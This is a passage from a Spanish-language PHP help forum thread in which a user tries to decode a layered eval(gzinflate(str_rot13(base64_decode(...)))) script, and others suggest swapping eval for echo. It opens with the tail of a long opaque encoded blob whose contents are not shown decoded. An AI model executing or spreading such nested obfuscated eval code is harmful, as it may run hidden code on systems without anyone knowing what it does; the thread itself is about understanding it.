JVm8MsHzejXI97lW7V65TXFF03R82mLUV1a+fBwnhrWwYIM9ZMU45RWhfrlbcu5Bsl0KGbpmun0jnwuR0csNtxk3AVH1Im4018ryvY9wdMKTs58gfOCP8CMjrzoajcm2zuSRzRp1RY0E258R6fbMexhof1BNqRQfCrqUG/7tCo8XP3PxFdl8QH5wJAc7eDJBNUgbhWyf53Vg8ZO6O0yUROI3On/sOylNnLfoP4Zpn4JyfjPG20PWn4SGL+WDgEjwXXHUyOat6pR16X5Xw9F8xHxKhMRD/oEbzXfJzU1z+kZ9AOoT1gZBf5hPR8PSecbr83upJPexnPMY0mfbvChqK6SbOuzLsZhhQNalsV+/kj5kgIULie77Lj4/F6BOULOFNKgDUSSmn60ksOkddc9CKrU1yIMav/h4quyWdWeu41b15zQvpKtJWH1qhrLCy3PgGyBye2Kv0Q+LCJWXkq3NdfAgjYRVEHegg2evRf2lruvj0K/AILY+jlgm5C5shNM8lmj6PockzJQHZZyBCQZGrgITffedim2u0UPb6s8mdOEBIEhzmi4pT9U4JIr5AMa+oQvd6+/Tx2hZJhcYwXGEj9JLkSYtOgsHYMDrVguJ7K2RsDgjjYjF/+LcnVKdCoJ5rq+aRoSb3begpEm0atGk4oyu5tbe5HQYZoTFDKXQkqEUzyLHAtIn9HqTMvWlvvle12BPllW47G73fqra/UXRTkfF05I1pfn8DM1bnqnsGu9E7+IIwda8kIaVlS4fjMy/obbtWXjYSGeAGPU3KyI5H9vnHAn4HRKY1RdE2ykPhWv3tTWmisviwwMQgZSDTeizLEzDu19VmP5A9yoLuZdSPSV0FNEqaF+YQ1+2IbLRB1eApIJNb8+y1xac+1zowB+qY6oR4haFCYc9yytrJV38V6A49/4NE+TbMPNcvOokvH46Jjvzu+lsLVcpzwXEpnFw/4m+4i8VJ/d4C099USSGseLTa2yBtYUPUQ6o43WI8ff0fZvhHE9UN4y3E95yzKp+68L6LCskn8BKvZfLWl7hSywhOVaRrEHlNOF+2Y76VM2w6K4977FBGmtBaEhGLzN4KhyCsnrFWls9FGUeUl7nT5oBzmWqClkSOKg5YYQqdVLOp7hpoIaJUbjucnS6fSSnYX60yEFr0sB8ssI27Zq/S2JuwlL6N6ZIvfS1SOfs2rovu+gYOBbAe/GGPZrVKFPLwlf+aSMkmVn9RZXkLRBTzLu5rYQWmhN8gN1gCPAY5gIiaX3V98XrOfVZHGWgU4AgKYIdTXPC6Al9zFOUpfqPoDsfSPFeyb7kW3qY3JELCaNXtr4ZqQ2dLzYeqDUdOT4k7MUCrZpQP+YeGdVPPzL2b2wTmK6gzwmrNswux+XCGcn4i6LoOdoY0puNPzaCSJrRRrHf2IPWr5LWhRhMCcDzSlXdYjvuOhpLmccmLYoLqjcn5ttAS6xuR8PCx+8zdW5+ZfLB9oxFlND/gfk3I0LLlkdPurztSs0DfrW6vO0/89JhRBfPm2aOauj58OhaFtAJOLXMn/8hcozvMWuByRdEyyUZThKgxuZ6p7v7qHsQUKY3SwzUfKfu52aMMhlrJ10CTglA6oSNV2behJys+qYM5KlHwpjck7EAIn+XA67d3KZo4u17OZdtWabFHVxhxH4beGTGkGIcP02FJh5ypmTKYuOKMsCeDFfTpWX3eaCFJwiSJAmCoGyeJ1UQFFUy//nrr7/++8e///z97/8B'))); 
  #4 (permalink)  
Antiguo 15/01/2008, 19:00
Avatar de andruqui  
Fecha de Ingreso: agosto-2007
Mensajes: 269
Antigüedad: 16 años, 8 meses
Puntos: 2
Re: funcion eval - duda

Mmmmmmmmm
Eso me muestra codigo con eval(gzinflate(str_rot13(base64_decode('DZe3Eo ............
de neuvo :(

Saludos
Andres
  #5 (permalink)  
Antiguo 15/01/2008, 20:22
okram
Invitado
 
Mensajes: n/a
Puntos:
Re: funcion eval - duda

Bueno, vuelve a reemplazar eval() por echo o print.

Saludos,
  #6 (permalink)  
Antiguo 15/01/2008, 21:33
 
Fecha de Ingreso: enero-2008
Ubicación: en Punta Arenas
Mensajes: 47
Antigüedad: 16 años, 3 meses
Puntos: 0
Re: funcion eval - duda

http://foro.dragonjar.us/desencriptar_codigo_tipo_evalurldecodebase64decode-t15481.0.html

hay creo que esta tu solucion
  #7 (permalink)  
Antiguo 15/01/2008, 21:53
Avatar de andruqui  
Fecha de Ingreso: agosto-2007
Mensajes: 269
Antigüedad: 16 años, 8 meses
Puntos: 2
Re: funcion eval - duda

No termino de entenderlo, lo hago y me sigue apareciendo eval(.....)
siempre aparece un eval :(
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Tema Cerrado




La zona horaria es GMT -6. Ahora son las 13:06.